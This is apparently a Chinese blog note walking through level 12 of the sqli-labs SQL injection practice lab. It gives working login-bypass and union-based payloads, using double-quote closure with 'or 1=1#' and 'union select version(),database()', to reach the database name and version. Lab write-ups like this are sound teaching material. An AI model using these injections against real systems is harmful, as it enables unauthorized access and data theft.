sqllab第十二关通关笔记

知识点:

  • 一般字符型注入分类
    • 单引号闭合
    • 双引号闭合
  • 这是一个双引号闭合

看界面又是一个输入框的注入;通过admin admin进行登录发现页面还是有回显

直接使用万能密码尝试

构造payload:username=admin'or1=1

没有任何反应;可能是没加注释符的关闭

构造username=admin'or+1=1#

发现还是没有任何回显信息;第一反应是特殊字符过滤??;或许是单引号的问题

使用双引号试一下

构造payload:username=admin"or+1=1

发现有了报错信息;发现原始语句应该是where username=("输入内容") and passwd=

好好好;知道了原始语句就可以绕过了

构造payload:username=admin"+or+1=1#

页面成功打印出了用户信息

接下来尝试进行联合注入

构造payload:username=a"+union+select+1,2#

成功打印出了输入的信息

接下来获取对应数据库的版本信息和数据库名

构造payload:username=a"+union+select+version(),database()#

成功获取了数据库名和版本信息;

到这里就结束了;具体的敏感信息就不获取了,实际操作和第十一关一样

10

相关推荐
孙严Pay13 分钟前
网关支付:在线交易的安全核心枢纽
笔记·科技·计算机网络·其他·微信
代码游侠15 分钟前
应用——Linux Framebuffer 图形库显示
linux·运维·服务器·数据库·笔记·算法
laplace012321 分钟前
Part 1. 大模型RAG入门基础架构介绍
笔记·语言模型·langchain·rag
【上下求索】21 分钟前
学习笔记097——Ubuntu系统中如何通过service服务的方式启动 jar 包?
java·笔记·学习·ubuntu
_Kayo_43 分钟前
node.js 学习笔记5
笔记·学习
AI视觉网奇1 小时前
ue 条件判断
笔记·算法·ue5
chushiyunen1 小时前
mongodb笔记
数据库·笔记·mongodb
微软技术分享1 小时前
2022年的梦境笔记
笔记
白羽陌1 小时前
【学习笔记】SketchUp学习笔记
笔记·学习
Yu_Lijing1 小时前
基于C++的《Head First设计模式》笔记——装饰者模式
c++·笔记·设计模式